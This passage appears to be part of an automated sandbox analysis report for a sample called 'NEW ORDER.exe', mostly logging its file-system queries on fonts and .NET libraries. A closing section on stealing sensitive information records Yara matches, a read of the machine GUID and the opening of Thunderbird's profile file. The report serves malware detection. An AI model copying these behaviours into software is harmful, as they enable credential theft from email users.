                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Users\user\Desktop\NEW ORDER.exe VolumeInformation
Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\NEW ORDER.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match | File source: 00000007.00000002.501192727.0000000002B51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: NEW ORDER.exe PID: 4932, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: NEW ORDER.exe PID: 5108, type: MEMORYSTR
Source: Yara match | File source: 0.2.NEW ORDER.exe.3facab0.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.NEW ORDER.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.NEW ORDER.exe.3facab0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000000.265553300.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.277628722.0000000003E79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.501192727.0000000002B51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.501750120.0000000002BC3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: NEW ORDER.exe PID: 4932, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: NEW ORDER.exe PID: 5108, type: MEMORYSTR
Source: C:\Users\user\Desktop\NEW ORDER.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
